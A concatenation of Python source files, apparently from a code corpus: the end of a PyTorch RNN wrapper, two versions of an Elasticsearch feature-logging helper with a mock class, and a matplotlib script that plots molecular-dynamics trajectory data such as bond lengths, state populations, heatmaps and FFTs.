hidden = (hn,cn)
else:
hidden = hn
return output,hidden
def init_hidden(self,batch_size):
h0 = torch.zeros(batch_size,self._hidden_size)
if self._rnn_type == "LSTM":
return h0,h0
else :
return h0
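# Usage sketch (toy shapes; assumes the corrections above):
# rnn = RnnCommon(input_size=16, hidden_size=32, layer_num=1, batch_first=True)
# x = torch.randn(4, 10, 16)              # [batch, seq, input_size]
# mask = torch.ones(4, 10)                # 1 for real tokens, 0 for padding
# output, (hn, cn) = rnn(x, mask)         # output: [4, 10, 64] for a bidirectional LSTM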
|
baseline/lstm/model/RNN_Common.py
|
| 0.783285 | 0.298447 |
import atexit
import datetime
import functools
import hashlib
import logging
import os
import socket
import threading
import time
import traceback
from copy import deepcopy
import elasticsearch
import elasticsearch.helpers
class Constants:
HOST_KEY = 'host'
PROCESS_KEY = 'process'
THREAD_NAME_KEY = 'threadName'
THREAD_ID_KEY = 'thread'
USERNAME_KEY = 'username'
TIMESTAMP_KEY = 'timestamp'
INFO_VALUE = 'INFO'
WARN_VALUE = 'WARN'
ERROR_VALUE = 'ERROR'
LEVEL_NAME_KEY = 'levelname'
FEATURE_NAME_KEY = 'feature_name'
FEATURE_DURATION_KEY = 'feature_duration_seconds'
class RepeatingThread(threading.Timer):
    def run(self):
        # wait() returns False while the cancel flag is unset, so this keeps firing
        # every `interval` seconds until cancel() is called
        while not self.finished.wait(self.interval):
            try:
                self.function(*self.args, **self.kwargs)
            except Exception:
                # keep going, and try again in the next time slot to push data
                pass
class ElasticSearchHelper(object):
def __init__(self, client, index, extra_values=None, auto_flush=True, flush_period_seconds=20):
"""
:param client: ElasticSearch Client that's already initialized
:param index: index name without wildcard (year and date will be automatically added, foo_index -> foo_index.year.month)
:param extra_values: dictionary of extra values that will go with every request
        :param auto_flush: Whether or not to flush the buffer automatically on a background thread
:param flush_period_seconds: The frequency of flushing in seconds
"""
assert index.islower(), "index must be all lower-case. This is an ElasticSearch limitation"
self.client = client
self.index = index
self.flush_thread = None
if auto_flush:
self.flush_thread = RepeatingThread(flush_period_seconds, self.flush_buffer)
self.actions_buffer = []
self.validate_connection()
self.extra_values = extra_values or {}
# make sure we flush when process exit
atexit.register(self.on_process_exit)
@classmethod
def get_instance(cls, host, index, port=9200, use_ssl=False, verify_certs=True,
connection_class=elasticsearch.RequestsHttpConnection,
**kwargs):
"""
Factory method for easy construction
:rtype: ElasticSearchHelper
"""
client = elasticsearch.Elasticsearch(hosts=[{'host': host, 'port': port}], use_ssl=use_ssl,
verify_certs=verify_certs,
connection_class=connection_class, **kwargs)
return cls(client, index)
def change_flush_interval(self, interval):
"""
Change flush interval of buffering thread
:param interval: interval in seconds
"""
assert self.flush_thread, "Cannot change flush interval when auto_flush is False"
self.flush_thread.interval = interval
def on_process_exit(self):
"""
        This will be called when the process exits to flush remaining records if auto_flush is enabled
:return: None
"""
if self.flush_thread:
self.flush_thread.cancel()
self.flush_buffer()
def add_elasticsearch_records(self, data_list):
"""
add records to buffer. Will not be pushed to elasticsearch unless flush_buffer is called
:param data_list: list of dict that contains data to be pushed, default_values will be automatically added to each dictionary
each dict cannot contain duplicate keys with default_values
:return: None
"""
actions = [self.create_data_record(data_dict) for data_dict in data_list]
self.actions_buffer.extend(actions)
def flush_buffer(self):
"""
Flush buffer and push it to elasticsearch
:return: None
"""
if not self.actions_buffer:
return
# reset actions buffer and take what's currently in the list
actions = self.actions_buffer
self.actions_buffer = []
try:
elasticsearch.helpers.bulk(self.client, actions, stats_only=True)
except Exception as e:
# put actions back if it failed
self.actions_buffer.extend(actions)
raise
def create_data_record(self, data_dict):
"""
Create data record (dict) that is ready to be pushed to elasticsearch
:param data_dict:
:return: dict of elastic search record
:rtype: dict
"""
source_dict = deepcopy(data_dict)
        assert not self.is_conflicting_keys(data_dict,
                                            self.default_values), "Conflicting keys between data_dict and default_values"
source_dict.update(self.default_values)
return {
'_index': self.get_full_index(),
'_type': 'python_log',
'_source': source_dict
}
@classmethod
def is_conflicting_keys(cls, d1, d2):
"""
Return trur if there are conflicting keys between 2 dictionaries
:param d1:
:param d2:
:return:
"""
return bool(set(d1.keys()).intersection(set(d2.keys())))
def get_full_index(self):
"""
get index name
:rtype: str
:return: Index name with year and month attached to it
"""
datenow = datetime.datetime.utcnow()
index = '{index}-{year}.{month}'.format(index=self.index, year=datenow.year, month=datenow.month)
return index
@property
def default_values(self):
data_dict = {
Constants.HOST_KEY: socket.getfqdn(),
Constants.PROCESS_KEY: os.getpid(),
Constants.THREAD_NAME_KEY: threading.current_thread().name,
Constants.THREAD_ID_KEY: threading.current_thread().ident,
Constants.TIMESTAMP_KEY: str(datetime.datetime.utcnow().isoformat())
}
assert not self.is_conflicting_keys(data_dict,
self.extra_values), "Conflicting keys between default_values and extra_values"
data_dict.update(self.extra_values)
return data_dict
def validate_connection(self):
"""
ping server to make sure it's reachable. Raises exception if server cannot be reached
:return:
"""
for hostInfo in self.client.transport.hosts:
host = hostInfo.get('host')
port = hostInfo.get('port')
self.validate_server_connection(host, port)
@classmethod
def validate_server_connection(cls, host, port):
url = 'http://{}:{}'.format(host, port)
import requests
res = requests.get(url)
assert res.status_code == 200, "Failed to connect to ElasticSearch Server {}".format(url)
def log_feature(self, feature_name, feature_duration_seconds=None, levelname=Constants.INFO_VALUE, **kwargs):
"""
        Log a feature and add it to the buffer; this will not push data immediately to Elasticsearch. A subsequent call to flush_buffer is required if auto_flush is disabled
:param feature_name: feature name in string
:param feature_duration_seconds: time it took to complete this feature in seconds
:param levelname: Severity of this log (INFO, ERROR, WARN)
:param kwargs: additional values to be added to the record
:return:
"""
data_dict = {
Constants.FEATURE_NAME_KEY: feature_name,
Constants.LEVEL_NAME_KEY: levelname,
}
data_dict.update(**kwargs)
if feature_duration_seconds is not None:
data_dict.update({Constants.FEATURE_DURATION_KEY: feature_duration_seconds})
self.add_elasticsearch_records([data_dict])
def log_feature_error(self, feature_name, feature_duration_seconds=None, **kwargs):
"""
Log feature as an error, Same as log_feature but with levelname = ERROR
"""
self.log_feature(feature_name, feature_duration_seconds=feature_duration_seconds,
levelname=Constants.ERROR_VALUE, **kwargs)
def log_feature_decorator(self, feature_name, **feature_kwargs):
"""
Decorator to be used on any function, without changing its behavior. Each call to the decorated function will add it to buffer
:param feature_name: feature name in string
:param feature_kwargs: Additional values that will be added to each function call
:return:
"""
# create actual decorator, since this decorator take an argument of featureName
def decorator(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
start = time.time()
# execute function
try:
return_val = function(*args, **kwargs)
duration_seconds = time.time() - start
try:
self.log_feature(feature_name, duration_seconds, **feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature", exc_info=1)
return return_val
except Exception as e:
exc_text = traceback.format_exc()
duration_seconds = time.time() - start
                exc_hash = hashlib.sha1(exc_text.encode("utf-8")).hexdigest()
try:
self.log_feature_error(feature_name, duration_seconds,
exc_text=exc_text,
exc_hash=exc_hash,
                                           exc_message=str(e),
**feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature error", exc_info=1)
raise
return wrapper
return decorator
class MockElasticSearchHelper(ElasticSearchHelper):
def __init__(self, *args, **kwargs):
super(MockElasticSearchHelper, self).__init__(client=None, index='none', auto_flush=False)
def validate_connection(self):
pass
def log_feature(self, *args, **kwargs):
pass
def log_feature_error(self, *args, **kwargs):
pass
def log_feature_decorator(self, feature_name, **feature_kwargs):
def decorator(function):
return function
return decorator
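# Usage sketch (host, index and feature names are illustrative; get_instance and
# log_feature_decorator are defined above):
# helper = ElasticSearchHelper.get_instance(host="localhost", index="app_metrics")
# helper.log_feature("report_export", feature_duration_seconds=1.2, username="alice")
#
# @helper.log_feature_decorator("nightly_sync")
# def nightly_sync():
#     ...                                  # duration and errors are recorded automatically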
|
elasticsearch_util/helper.py
|
import atexit
import datetime
import functools
import hashlib
import logging
import os
import socket
import threading
import time
import traceback
from copy import deepcopy
import elasticsearch
import elasticsearch.helpers
class Constants:
HOST_KEY = 'host'
PROCESS_KEY = 'process'
THREAD_NAME_KEY = 'threadName'
THREAD_ID_KEY = 'thread'
USERNAME_KEY = 'username'
TIMESTAMP_KEY = 'timestamp'
INFO_VALUE = 'INFO'
WARN_VALUE = 'WARN'
ERROR_VALUE = 'ERROR'
LEVEL_NAME_KEY = 'levelname'
FEATURE_NAME_KEY = 'feature_name'
FEATURE_DURATION_KEY = 'feature_duration_seconds'
class RepeatingThread(threading.Timer):
    def run(self):
        # wait() returns False while the cancel flag is unset, so this keeps firing
        # every `interval` seconds until cancel() is called
        while not self.finished.wait(self.interval):
            try:
                self.function(*self.args, **self.kwargs)
            except Exception:
                # keep going, and try again in the next time slot to push data
                pass
class ElasticSearchHelper(object):
def __init__(self, client, index, extra_values=None, auto_flush=True, flush_period_seconds=20):
"""
:param client: ElasticSearch Client that's already initialized
:param index: index name without wildcard (year and date will be automatically added, foo_index -> foo_index.year.month)
:param extra_values: dictionary of extra values that will go with every request
        :param auto_flush: Whether or not to flush the buffer automatically on a background thread
:param flush_period_seconds: The frequency of flushing in seconds
"""
assert index.islower(), "index must be all lower-case. This is an ElasticSearch limitation"
self.client = client
self.index = index
self.flush_thread = None
if auto_flush:
self.flush_thread = RepeatingThread(flush_period_seconds, self.flush_buffer)
self.actions_buffer = []
self.validate_connection()
self.extra_values = extra_values or {}
# make sure we flush when process exit
atexit.register(self.on_process_exit)
@classmethod
def get_instance(cls, host, index, port=9200, use_ssl=False, verify_certs=True,
connection_class=elasticsearch.RequestsHttpConnection,
**kwargs):
"""
Factory method for easy construction
:rtype: ElasticSearchHelper
"""
client = elasticsearch.Elasticsearch(hosts=[{'host': host, 'port': port}], use_ssl=use_ssl,
verify_certs=verify_certs,
connection_class=connection_class, **kwargs)
return cls(client, index)
def change_flush_interval(self, interval):
"""
Change flush interval of buffering thread
:param interval: interval in seconds
"""
assert self.flush_thread, "Cannot change flush interval when auto_flush is False"
self.flush_thread.interval = interval
def on_process_exit(self):
"""
This will be called when process exit to flush remaining records if auto_flush is enabled
:return: None
"""
if self.flush_thread:
self.flush_thread.cancel()
self.flush_buffer()
def add_elasticsearch_records(self, data_list):
"""
add records to buffer. Will not be pushed to elasticsearch unless flush_buffer is called
:param data_list: list of dict that contains data to be pushed, default_values will be automatically added to each dictionary
each dict cannot contain duplicate keys with default_values
:return: None
"""
actions = [self.create_data_record(data_dict) for data_dict in data_list]
self.actions_buffer.extend(actions)
def flush_buffer(self):
"""
Flush buffer and push it to elasticsearch
:return: None
"""
if not self.actions_buffer:
return
# reset actions buffer and take what's currently in the list
actions = self.actions_buffer
self.actions_buffer = []
try:
elasticsearch.helpers.bulk(self.client, actions, stats_only=True)
except Exception as e:
# put actions back if it failed
self.actions_buffer.extend(actions)
raise
def create_data_record(self, data_dict):
"""
Create data record (dict) that is ready to be pushed to elasticsearch
:param data_dict:
:return: dict of elastic search record
:rtype: dict
"""
source_dict = deepcopy(data_dict)
assert not self.is_conflicting_keys(data_dict,
self.default_values), "Conflicting keys between default_values and extra_values"
source_dict.update(self.default_values)
return {
'_index': self.get_full_index(),
'_type': 'python_log',
'_source': source_dict
}
@classmethod
def is_conflicting_keys(cls, d1, d2):
"""
Return trur if there are conflicting keys between 2 dictionaries
:param d1:
:param d2:
:return:
"""
return bool(set(d1.keys()).intersection(set(d2.keys())))
def get_full_index(self):
"""
get index name
:rtype: str
:return: Index name with year and month attached to it
"""
datenow = datetime.datetime.utcnow()
index = '{index}-{year}.{month}'.format(index=self.index, year=datenow.year, month=datenow.month)
return index
@property
def default_values(self):
data_dict = {
Constants.HOST_KEY: socket.getfqdn(),
Constants.PROCESS_KEY: os.getpid(),
Constants.THREAD_NAME_KEY: threading.current_thread().name,
Constants.THREAD_ID_KEY: threading.current_thread().ident,
Constants.TIMESTAMP_KEY: str(datetime.datetime.utcnow().isoformat())
}
assert not self.is_conflicting_keys(data_dict,
self.extra_values), "Conflicting keys between default_values and extra_values"
data_dict.update(self.extra_values)
return data_dict
def validate_connection(self):
"""
ping server to make sure it's reachable. Raises exception if server cannot be reached
:return:
"""
for hostInfo in self.client.transport.hosts:
host = hostInfo.get('host')
port = hostInfo.get('port')
self.validate_server_connection(host, port)
@classmethod
def validate_server_connection(cls, host, port):
url = 'http://{}:{}'.format(host, port)
import requests
res = requests.get(url)
assert res.status_code == 200, "Failed to connect to ElasticSearch Server {}".format(url)
def log_feature(self, feature_name, feature_duration_seconds=None, levelname=Constants.INFO_VALUE, **kwargs):
"""
log feature and it to buffer, this will not push data immediately to elastic search. Subsequent call to flush_buffer is required if auto_flush is disabled
:param feature_name: feature name in string
:param feature_duration_seconds: time it took to complete this feature in seconds
:param levelname: Severity of this log (INFO, ERROR, WARN)
:param kwargs: additional values to be added to the record
:return:
"""
data_dict = {
Constants.FEATURE_NAME_KEY: feature_name,
Constants.LEVEL_NAME_KEY: levelname,
}
data_dict.update(**kwargs)
if feature_duration_seconds is not None:
data_dict.update({Constants.FEATURE_DURATION_KEY: feature_duration_seconds})
self.add_elasticsearch_records([data_dict])
def log_feature_error(self, feature_name, feature_duration_seconds=None, **kwargs):
"""
Log feature as an error, Same as log_feature but with levelname = ERROR
"""
self.log_feature(feature_name, feature_duration_seconds=feature_duration_seconds,
levelname=Constants.ERROR_VALUE, **kwargs)
def log_feature_decorator(self, feature_name, **feature_kwargs):
"""
Decorator to be used on any function, without changing its behavior. Each call to the decorated function will add it to buffer
:param feature_name: feature name in string
:param feature_kwargs: Additional values that will be added to each function call
:return:
"""
# create actual decorator, since this decorator take an argument of featureName
def decorator(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
start = time.time()
# execute function
try:
return_val = function(*args, **kwargs)
duration_seconds = time.time() - start
try:
self.log_feature(feature_name, duration_seconds, **feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature", exc_info=1)
return return_val
except Exception as e:
exc_text = traceback.format_exc()
duration_seconds = time.time() - start
exc_hash = hashlib.sha1(exc_text).hexdigest()
try:
self.log_feature_error(feature_name, duration_seconds,
exc_text=exc_text,
exc_hash=exc_hash,
exc_message=e.message,
**feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature error", exc_info=1)
raise
return wrapper
return decorator
class MockElasticSearchHelper(ElasticSearchHelper):
def __init__(self, *args, **kwargs):
super(MockElasticSearchHelper, self).__init__(client=None, index='none', auto_flush=False)
def validate_connection(self):
pass
def log_feature(self, *args, **kwargs):
pass
def log_feature_error(self, *args, **kwargs):
pass
def log_feature_decorator(self, feature_name, **feature_kwargs):
def decorator(function):
return function
return decorator
| 0.517083 | 0.21032 |
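A minimal usage sketch of the helper above, assuming the module is importable from the elasticsearch_util/helper.py path shown; the feature name and extra keyword are invented for illustration.
from elasticsearch_util.helper import ElasticSearchHelper, MockElasticSearchHelper
# Offline/testing: the mock needs no cluster and its decorator is a no-op pass-through.
helper = MockElasticSearchHelper()
@helper.log_feature_decorator('generate_report', component='billing')  # hypothetical feature name/kwarg
def generate_report(n):
    return sum(range(n))
generate_report(1000)
# Against a real cluster one would instead build the helper via, e.g.:
# helper = ElasticSearchHelper.get_instance('es.example.internal', 'feature_usage')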
import mathutils
import numpy as np
import sys
import os
import json
if len(sys.argv) < 5:
print(f"""Not enough arguemnts!\n Use : {sys.argv[0]}
[/path/manifest.json]
=> [BL=1-2,2-3]
=> [PBL=1-2,2-3]
=> [NM=1,2,3]
=> [CIs=A|1,2,3]
=> [CSFs=A|1,2,3]
=> [CSFv=label:1,1,0,0_label:0,0,1,1]
=> [AVCSFs=A|1,2,3:av_window]
=> [AVCSFv=av_window_label:1,0,0_label:0,0,1]
=> [SD=A|1,2]
=> [MQ=A|1,2]
=> [HM=sd|mq:atom_num:nbins:min_y:max_y]
=> [FFT=cd|mq|csf:CHOP:[START:END]|A:1,2,3|A]
[width/panel, height]
[Output x11 | filename.png]
""")
sys.exit(-1)
ATOMICLABELS = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S',
'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb',
'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra',
'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og'] # Yes *all* of the elements
manifest_path = sys.argv[1]
commands = sys.argv[2:-2]
wpp, height = [float(i) for i in sys.argv[-2].split(',')]
OUTPUT = sys.argv[-1] # Either plot to a file or x11 window
assert(os.path.exists(manifest_path))
with open(manifest_path, 'r') as f:
manifest = json.load(f)
basepath = os.path.dirname(manifest_path)
times = np.load(os.path.join(basepath, 'times'))
nms = np.load(os.path.join(basepath, 'nm_ave'))
diabats = np.load(os.path.join(basepath, 'csf_ave'))
adiabats = np.load(os.path.join(basepath, 'ci_ave'))
avegeom = np.load(os.path.join(basepath, 'xyz_ave'))
mq = np.load(os.path.join(basepath, 'mq_ave'))
sd = np.load(os.path.join(basepath, 'sd_ave'))
nsteps = manifest['steps']
# DO PLOTTING
import matplotlib.pyplot as plt
# Define custom default colours - keep consistent between plots
# List loosely based on https://sashamaps.net/docs/resources/20-colors/
# Do this for the CSFs/CIs/FFT/NMs/MQ/SD
def get_nth_col(idx):
cols =['#e6194B', '#3cb44b', '#FFC800', '#4363d8', '#f58231', '#42d4f4', '#f032e6', '#fabed4', '#469990', '#dcbeff', '#9A6324', '#800000', '#aaffc3', '#000075', '#a9a9a9']
return cols[idx%len(cols)]
fig, axes = plt.subplots(1, len(commands), num=manifest_path, figsize=(wpp * len(commands), height))
if len(commands) == 1 : axes = [axes] # MPL messes with array if only one plot => Need to re-array
for n, c in enumerate(commands):
cmd, ins = c.split('=')
# GEOMETRICS
if cmd == 'BL':
BPS = []
for x in ins.split(','):
a, b = [int(z) for z in x.split('-')]
BPS.append([a,b])
for a in BPS:
dp = []
for x in range(nsteps):
dp.append(mathutils.MathUtils.bond_length(avegeom[x, a[0]-1],avegeom[x, a[1]-1] ))
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}]')
axes[n].set_title('Bond lengths')
axes[n].set_ylabel('Bond length (Å)')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'PBL':
BPS = []
for x in ins.split(','):
a, b = [int(z) for z in x.split('-')]
BPS.append([a,b])
for a in BPS:
dp = []
init_bl = mathutils.MathUtils.bond_length(avegeom[0, a[0]-1],avegeom[0, a[1]-1] )
for x in range(nsteps):
bl = mathutils.MathUtils.bond_length(avegeom[x, a[0]-1],avegeom[x, a[1]-1] )
dp.append((bl - init_bl) / init_bl)
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}]')
axes[n].set_title('Bond lengths (fractional)')
axes[n].set_ylabel('Fractional change')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'NM':
for x in [int(i) for i in ins.split(',')]:
axes[n].plot(times, nms[x-1], label=f'NM{x}', color=get_nth_col(x-1))
axes[n].set_title('Normal mode evolution')
axes[n].set_ylabel('Normal mode excitation')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'BA':
BPS = []
for x in ins.split(','):
a, b, c = [int(z) for z in x.split('-')]
BPS.append([a,b,c])
for a in BPS:
dp = []
for x in range(nsteps):
dp.append(mathutils.MathUtils.bond_angle(avegeom[x, a[0]-1],avegeom[x, a[1]-1], avegeom[x, a[2]-1] ))
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
try: alab3 = ATOMICLABELS[manifest['atomnos'][str(a[2])]-1]
except: alab3 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}] - {alab3}[{a[2]}]')
axes[n].set_ylabel('Bond angle (rad)')
axes[n].set_title('Bond angle')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'DA':
BPS = []
for x in ins.split(','):
a, b, c, d = [int(z) for z in x.split('-')]
BPS.append([a,b,c,d])
for a in BPS:
dp = []
for x in range(nsteps):
dha = mathutils.MathUtils.dihedral([avegeom[x, a[0]-1],avegeom[x, a[1]-1], avegeom[x, a[2]-1], avegeom[x, a[3]-1] ])
dp.append(dha)
try: alab1 = ATOMICLABELS[manifest['atomnos'][str(a[0])]-1]
except: alab1 = '?'
try: alab2 = ATOMICLABELS[manifest['atomnos'][str(a[1])]-1]
except: alab2 = '?'
try: alab3 = ATOMICLABELS[manifest['atomnos'][str(a[2])]-1]
except: alab3 = '?'
try: alab4 = ATOMICLABELS[manifest['atomnos'][str(a[3])]-1]
except: alab4 = '?'
axes[n].plot(times, dp, label=f'{alab1}[{a[0]}] - {alab2}[{a[1]}] - {alab3}[{a[2]}] - {alab4}[{a[3]}]')
axes[n].set_ylabel('Dihedral angle (rad)')
        axes[n].set_title('Dihedral angle')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
# ELECTRONICS
elif cmd == 'CIs':
CI_STATES = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(adiabats.shape[0]):
if CI_STATES == None: pass
else:
if i+1 not in CI_STATES: continue
axes[n].plot(times, adiabats[i], label=f'CI {i+1}', color=get_nth_col(i))
axes[n].set_title('Adiabatic [CI] state evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'CSFs':
CSF_STATES = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(diabats.shape[0]):
if CSF_STATES == None: pass
else:
if i+1 not in CSF_STATES: continue
axes[n].plot(times, diabats[i], label=f'CSF {i+1}', color=get_nth_col(i))
axes[n].set_title('Diabatic [CSF] state evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'CSFv':
# Expect a list of label:1,1,0,0_label:0,0,1,1
to_plot={}
for i in ins.split('_'):
label, nums = i.split(':')
nums = [float(j) for j in nums.split(',')]
assert(len(nums)==diabats.shape[0])
to_plot[label] = np.array(nums)
for k, v in to_plot.items():
data = np.dot(v, diabats)
axes[n].plot(times, data, label=k)
axes[n].set_title('Diabatic [CSF] state vector evolution')
axes[n].set_ylabel('State population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'AVCSFs':
csfs, av_window = ins.split(':')
av_window = int(av_window)
CSF_STATES = None if csfs=='A' else [int(i) for i in csfs.split(',')]
for i in range(diabats.shape[0]):
if CSF_STATES == None: pass
else:
if i+1 not in CSF_STATES: continue
mav = mathutils.MathUtils.moving_avg(diabats[i], av_window)
axes[n].plot(times[:len(mav)], mav, label=f'AVCSF {i+1}', color=get_nth_col(i))
axes[n].set_title(f'{av_window} point moving average diabatic [CSF] state evolution')
axes[n].set_ylabel('Averaged state population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'AVCSFv':
# Expect format av_window_label:1,0,0_label:0,0,1
av_window, *toplt = ins.split('_')
av_window = int(av_window)
to_plot={}
for i in toplt:
print(i)
label, nums = i.split(':')
nums = [float(j) for j in nums.split(',')]
assert(len(nums)==diabats.shape[0])
to_plot[label] = np.array(nums)
mavs = np.array([mathutils.MathUtils.moving_avg(i, av_window) for i in diabats])
print(mavs.shape)
for k, v in to_plot.items():
data = np.dot(v, mavs)
axes[n].plot(times[:len(data)], data, label=k)
axes[n].set_title(f'{av_window} point moving average diabatic [CSF] state custom vector evolution')
axes[n].set_ylabel('Averaged state population')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'SD':
SDS = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(len(manifest['spindenmap'])):
atom_number = manifest['spindenmap'][i]
if SDS == None : pass
elif atom_number not in SDS: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].plot(times, sd[i], label='{} [{}]'.format(symbol, atom_number), color=get_nth_col(atom_number))
axes[n].set_title('Spin density evolution (H Summed)')
axes[n].set_ylabel('Spin density')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
elif cmd == 'MQ':
MQS = None if ins=='A' else [int(i) for i in ins.split(',')]
for i in range(len(manifest['mullikenmap'])):
atom_number = manifest['mullikenmap'][i]
if MQS == None : pass
elif atom_number not in MQS: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].plot(times, mq[i], label='{} [{}]'.format(symbol, atom_number), color=get_nth_col(atom_number))
axes[n].set_title('Mulliken charge evolution (H Summed)')
axes[n].set_ylabel('Mulliken charge')
axes[n].set_xlabel('Time (fs)')
axes[n].legend(loc='upper right')
# Heatmaps - currently SD/MQ (may want to add BL)
elif cmd == 'HM':
def sbin_vals(nb, vals, val_scale, max_val, min_val):
x = np.zeros(nb)
step = (max_val-min_val)/nb
for n, v in enumerate(vals):
for i in range(nb):
if (min_val + i * step) < v < (min_val + (i+1) * step):
x[i] += val_scale[n]
return x[::-1]
def bin_vals(nb, vals, max_val, min_val):
val_len = len(vals)
return sbin_vals (nb, vals, np.repeat(1, val_len), max_val, min_val)
mode, selector, nbins, minval, maxval = ins.split(':')
nbins = int(nbins)
minval = float(minval)
maxval = float(maxval)
bindata = np.zeros((len(times), nbins))
if mode == 'sd':
atom_number = int(selector)
mapper = manifest['spindenmap'].index(atom_number)
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
            axes[n].set_title(f'Spin density (H Summed) heatmap for atom {symbol}[{atom_number}]')
axes[n].set_xlabel('Spin density (H Summed)')
ave_data = np.load(os.path.join(basepath, 'sd_ave'))[mapper]
unbinned_data=np.load(os.path.join(basepath, 'sd'))[mapper]
elif mode == 'mq':
atom_number = int(selector)
mapper = manifest['mullikenmap'].index(atom_number)
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
axes[n].set_title(f'Mulliken charge (H Summed) heatmap for atom {symbol}[{atom_number}]')
axes[n].set_xlabel('Mulliken charge (H Summed)')
ave_data = np.load(os.path.join(basepath, 'mq_ave'))[mapper]
unbinned_data=np.load(os.path.join(basepath, 'mq'))[mapper]
else:
raise Exception(f"Illegal mode {mode} for heatmap")
for i, _ in enumerate(times):
bindata[i] = bin_vals(nbins, unbinned_data[i], maxval, minval)
axes[n].set_xlabel('Time (fs)')
timewidth = (times[1]-times[0])/2 # Tiny fudging to get heatmap to align nicely
axes[n].imshow(bindata.T, cmap='inferno', extent=(-timewidth, times[-1]+timewidth, minval, maxval), aspect='auto')
axes[n].plot(times, ave_data, color='white', linestyle='dotted',linewidth=2)
# FFT
elif cmd == 'FFT':
        # [FFT=sd|mq|csf:CHOP:[START-END]|A]
mode, CHOP, RANGE, selector = ins.split(':')
CHOP=int(CHOP)
selector = None if selector == 'A' else [int(i) for i in selector.split(',')]
if mode == 'csf': data = diabats
elif mode == 'mq': data = mq
elif mode == 'sd': data = sd
else: raise Exception('Illegal FFT mode')
print(data.shape, len(times))
assert(data.shape[1] == len(times)) # Make sure extract worked
if RANGE != 'A':
s_idx, e_idx = [int(i) for i in RANGE.split('-')]
times_fft = times[s_idx:e_idx]
data_fft = data.T[s_idx:e_idx].T
else:
times_fft = times
data_fft = data
# Do FFT and plot up
N = data_fft.shape[1]
fig = plt.figure(num=manifest_path, figsize=(20.0, 15.0))
for i in range(data_fft.shape[0]):
if mode=='csf': # CSFs are picked by index
if selector == None : pass
elif i+1 not in selector: continue
ft = np.fft.fft(data_fft[i])
ft = ft.real**2 + ft.imag**2
freq = np.fft.fftfreq(N, d=times_fft[1]-times_fft[0])
if mode == 'sd' or mode == 'mq': # SD/MQ are picked based on atom number
if mode == 'sd' : atom_number = manifest['spindenmap'][i]
else : atom_number = manifest['mullikenmap'][i]
if selector == None : pass
elif atom_number not in selector: continue
try: symbol = ATOMICLABELS[manifest['atomnos'][str(atom_number)]-1]
except: symbol = '?'
label = f'{symbol}[{atom_number}]'
colour = get_nth_col(atom_number)
else:
label = f'CSF {i+1}'
colour = get_nth_col(i)
axes[n].plot(freq[CHOP:int(N/2)], ft[CHOP:int(N/2)], label=label, color=colour)
axes[n].set_title(f'FFT {mode}')
axes[n].set_ylabel('Intensity')
axes[n].set_xlabel('Frequency PHz')
